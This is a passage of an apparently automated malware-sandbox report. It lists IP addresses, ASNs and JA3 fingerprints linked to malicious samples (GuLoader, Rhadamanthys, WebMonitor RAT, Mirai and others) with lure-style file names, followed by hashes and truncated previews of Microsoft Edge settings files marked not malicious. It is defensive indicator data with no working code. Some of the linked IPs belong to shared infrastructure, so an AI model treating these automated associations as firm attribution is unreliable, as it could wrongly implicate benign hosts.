                                                                                                                                                                                                                                                                                    • 194.58.203.20
                                                                                                                                                                                                                                                                                    ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 194.58.203.20
                                                                                                                                                                                                                                                                                    download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 194.58.203.20
                                                                                                                                                                                                                                                                                    x.ns.gin.ntt.netList of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 129.250.35.250

                                                                                                                                                                                                                                                                                    ASNs

                                                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                    NTP-SEAnycastedNTPservicesfromNetnodIXPsSEList of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 194.58.203.20
                                                                                                                                                                                                                                                                                    ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 194.58.203.20
                                                                                                                                                                                                                                                                                    download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 194.58.203.20
                                                                                                                                                                                                                                                                                    regscs.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                                                                                                                                                                                                    • 194.58.200.20
                                                                                                                                                                                                                                                                                    PREVIOUS CONVERSATION.pdf.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                                                                                                                                                                                                    • 194.58.200.20
                                                                                                                                                                                                                                                                                    OUTSTANDING_DEBTS.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                                                                                                                                                                                                    • 194.58.200.20
                                                                                                                                                                                                                                                                                    NEW PURCHASE ORDER.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                                                                                                                                                                                                    • 194.58.200.20
                                                                                                                                                                                                                                                                                    STATEMENT OF ACCOUNT.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                                                                                                                                                                                                    • 194.58.200.20
                                                                                                                                                                                                                                                                                    Banking_cordinates_928273.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                                                                                                                                                                                                    • 194.58.200.20
                                                                                                                                                                                                                                                                                    REQUEST FOR QUOTATION.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                                                                                                                                                                                                    • 194.58.200.20
                                                                                                                                                                                                                                                                                    SIDNNLList of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 94.198.159.10
                                                                                                                                                                                                                                                                                    download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 94.198.159.10
                                                                                                                                                                                                                                                                                    MICROSOFT-CORP-MSN-AS-BLOCKUSmain.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 20.233.83.145
                                                                                                                                                                                                                                                                                    powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                                    • 52.151.111.14
                                                                                                                                                                                                                                                                                    loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                    • 20.55.13.142
                                                                                                                                                                                                                                                                                    loligang.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                    • 40.92.162.115
                                                                                                                                                                                                                                                                                    loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                    • 20.173.233.245
                                                                                                                                                                                                                                                                                    loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                    • 20.183.227.19
                                                                                                                                                                                                                                                                                    pyld611114.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 20.233.83.145
                                                                                                                                                                                                                                                                                    Lu4421.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                                                                                                                                                                                                                    • 20.233.83.145
                                                                                                                                                                                                                                                                                    http://trackmail.info/QLTRG66TP4/offer/00248/811/iuk7x/b4q/41/32Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 52.170.203.157
                                                                                                                                                                                                                                                                                    EXTERNALRe.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 52.182.143.210

                                                                                                                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                    caec7ddf6889590d999d7ca1b76373b6List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 92.255.85.148
                                                                                                                                                                                                                                                                                    cXjy5Y6dXX.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 92.255.85.148
                                                                                                                                                                                                                                                                                    payload_1.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 92.255.85.148
                                                                                                                                                                                                                                                                                    List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 92.255.85.148
                                                                                                                                                                                                                                                                                    ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 92.255.85.148
                                                                                                                                                                                                                                                                                    download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 92.255.85.148
                                                                                                                                                                                                                                                                                    wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 92.255.85.148
                                                                                                                                                                                                                                                                                    0a0#U00a0.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 92.255.85.148
                                                                                                                                                                                                                                                                                    UGcjMkPWwW.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 92.255.85.148
                                                                                                                                                                                                                                                                                    XAhzDHAVZ2.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 92.255.85.148

                                                                                                                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\407310\Hop.comfile.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, LummaC StealerBrowse
                                                                                                                                                                                                                                                                                      file.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                                                                                            SecuriteInfo.com.Win32.Malware-gen.8775.19492.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              O8scEm3rJN.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                KeyFormed.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  wWk9NkXYcL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                    eSLlhErJ0q.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                      7CTH165fQv.exeGet hashmaliciousLatrodectusBrowse

                                                                                                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\13516a39-6861-46c9-99e6-e34f534a9b41.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44252
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.090984085083194
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4koMyrWofptdzpwSAxrLtyRgnMUK8oZHCZoD:z/Ps+wsI7ynAtdz01j0RGoD
                                                                                                                                                                                                                                                                                                        MD5:2EBF7B96897AD8F4A41D158B91AFF425
                                                                                                                                                                                                                                                                                                        SHA1:1FC283D16B7EC158FF93CB089D74E3E64E1EB6A1
                                                                                                                                                                                                                                                                                                        SHA-256:39D9923F35E196A4C596DE226653C6A42B3BC4B6ADE4AF234797E5BF9015E21C
                                                                                                                                                                                                                                                                                                        SHA-512:C4FE77406CF892A9F83031FC7ED3C8426174728AAB40AE2709CCD6295CBB7C4FCF53146E7C0471B3DC77165E63F8867C481CDC756A4D4D8CC4B08547607029B6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\467ca223-0886-4aa1-9e32-9a705c1e4991.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44788
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.095653750745449
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xp8yrWohZRT1+bGWZwYbPjDFerLtyRgnMUK8oZHCZoD:z/Ps+wsI7yOTZRTgbxe1j0RGoD
                                                                                                                                                                                                                                                                                                        MD5:639A4EA6E62330AF893A692D920138B1
                                                                                                                                                                                                                                                                                                        SHA1:CC3E0597EB215C74366B7990956B96D0A0F6FAFA
                                                                                                                                                                                                                                                                                                        SHA-256:79F06DC97953721B9DD198623A2B94C9B0AD0C26A3946321BBCE2621C5C0E6BA
                                                                                                                                                                                                                                                                                                        SHA-512:ED0416962A107A08EC5A4080744DD4DEE67E6DB1D360A1A7DCF448CF2D52FC6F5769FAA2C92FDFD151B86FDD9AB876B074658443DCF3FECF0355EDB1068F6BBC
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\51bcd2db-9cb3-4da9-943b-52c3176a814d.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):48510
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.094222735245338
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:WDXzgWPsj/qlGJqIY8GB4xZq/yrWohZRT1+bG0Npq4ta0zQGerLtyRgnMUK8oZHK:W/Ps+wsI7yOZBZRTgb1q4he1j0RGoy
                                                                                                                                                                                                                                                                                                        MD5:D5F3644671F06A7C4147582A9208534D
                                                                                                                                                                                                                                                                                                        SHA1:89810A1C35EC2DAE9965ABCF312459C98665FFC5
                                                                                                                                                                                                                                                                                                        SHA-256:E6332758AD2552B2887C003C629792360040F49B969EB00AD580DC81F420DE5A
                                                                                                                                                                                                                                                                                                        SHA-512:5A1C91AF2A98C2DF9DABB53AD2D0195F9D8752F1E90BA6CCF34D04DE054D31F830917D5556F7A292C54AD9DB19C7B575A00C8392CFC4E84D50CC2EDE9C411674
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734530131"},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0V

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\6cc2f3a3-4c04-4981-a31a-c13e4e22b04f.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):45936
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.087793994361484
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:1MkbJrT8IeQc5dZr/yrWohZRT1+b25ZHRS4PXxYrCZocrLtyRgnMUK8oZRS:1Mk1rT8H1ZoZRTgbwXxwGoc1j0S
                                                                                                                                                                                                                                                                                                        MD5:C48F09D04E21AA9AC4B3C7B1E228AEAC
                                                                                                                                                                                                                                                                                                        SHA1:6DC55BF91FF5DCD8AD78855765EC1BA2A3A50492
                                                                                                                                                                                                                                                                                                        SHA-256:8796ABF91A3C2E8ECAA1ADF8302FCE271A4C1E13FBE7533263BE09CE9C3D5991
                                                                                                                                                                                                                                                                                                        SHA-512:2796A98953CC8F325B644E8AE317FCC7961D3858A4F854AE96117A85729A02E84D27B0B8C57E6FFE382FCF08BA39B2B8074C1EFC01D14949A24DE68359777DB9
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734530131"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\6f1896d4-1e90-4e14-bc3c-0fdefa7cdd38.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):45554
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.093062015499064
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:WDXzgWPsj/qlGJqIY8GB4xZq/yrWohZRT1+b25ZHRS4PerLtyRgnMUK8oZHCZoy:W/Ps+wsI7yOZBZRTgbwe1j0RGoy
                                                                                                                                                                                                                                                                                                        MD5:CBDB1A768B6F53EE157AD219D2CF1570
                                                                                                                                                                                                                                                                                                        SHA1:1AAE867FE9067B611FE6D5AFB21FD30E8EE5FDF1
                                                                                                                                                                                                                                                                                                        SHA-256:FAE6F2097CDC9D1EDD094C003399BEBC469E44BE49077970206E601AB0C5C49D
                                                                                                                                                                                                                                                                                                        SHA-512:60237B3E8E41772D454A70F5E7ECC62A0029998CE761CEE99487E40F615968591822C7140251A03F0F9DEE54914893BFAC517415EC3464E9530A4EBE5A551DEB
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734530131"},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0V

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\70b6d308-4f64-4120-8fe0-58824fa43ce7.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):48510
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.094222735245338
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:WDXzgWPsj/qlGJqIY8GB4xZq/yrWohZRT1+bG0Npq4ta0zQGerLtyRgnMUK8oZHK:W/Ps+wsI7yOZBZRTgb1q4he1j0RGoy
                                                                                                                                                                                                                                                                                                        MD5:D5F3644671F06A7C4147582A9208534D
                                                                                                                                                                                                                                                                                                        SHA1:89810A1C35EC2DAE9965ABCF312459C98665FFC5
                                                                                                                                                                                                                                                                                                        SHA-256:E6332758AD2552B2887C003C629792360040F49B969EB00AD580DC81F420DE5A
                                                                                                                                                                                                                                                                                                        SHA-512:5A1C91AF2A98C2DF9DABB53AD2D0195F9D8752F1E90BA6CCF34D04DE054D31F830917D5556F7A292C54AD9DB19C7B575A00C8392CFC4E84D50CC2EDE9C411674
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734530131"},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0V

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\7b47665f-6f73-4e5e-ae12-3f5e9047b8c8.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):45409
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.083780023901943
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:1MkbJrT8IeQc5dZr/yrWoCiteza9RS4VxYrCZocrLtyRgnMUK8oZRS:1Mk1rT8H1ZMtezSxwGoc1j0S
                                                                                                                                                                                                                                                                                                        MD5:3986138211E5772D6CB5FCB6D5308197
                                                                                                                                                                                                                                                                                                        SHA1:88A34F052713F66583A01E9D5AAD614B00703864
                                                                                                                                                                                                                                                                                                        SHA-256:A401B6086234E07857638724501F0D728A2F35A08CD6426FF4E8B4BDEBF39B84
                                                                                                                                                                                                                                                                                                        SHA-512:FE5CD11A3285C9CA6561525D7AF80EC6850EB77278D9E3E380A4F8BA56D3B838FC472B5F82286BE67486A358DC3193F2C82DC00B0C29E7F3C8D63F8100F7CCEF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734530131"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):107893
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.64013246649014
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P78:fwUQC5VwBIiElEd2K57P78
                                                                                                                                                                                                                                                                                                        MD5:10101225085294C4AA9050CEF19E599D
                                                                                                                                                                                                                                                                                                        SHA1:D1E683B46B7E0B1C4DE538392F7ACB4DF6280404
                                                                                                                                                                                                                                                                                                        SHA-256:6F703C25109774C2D844787790FFA45183787FBFA140A5AEAD247638E0987C21
                                                                                                                                                                                                                                                                                                        SHA-512:A8C5867A96AD36813905AD2C01D5C18CBB82D3F1F91DFCE64E48D60EED226F1F16DBD5F3B8FC9DF065D0C641A3245EC6E59556EE4B2C219852B0C43584D334F4
                                                                                                                                                                                                                                                                                                        Malicious:false
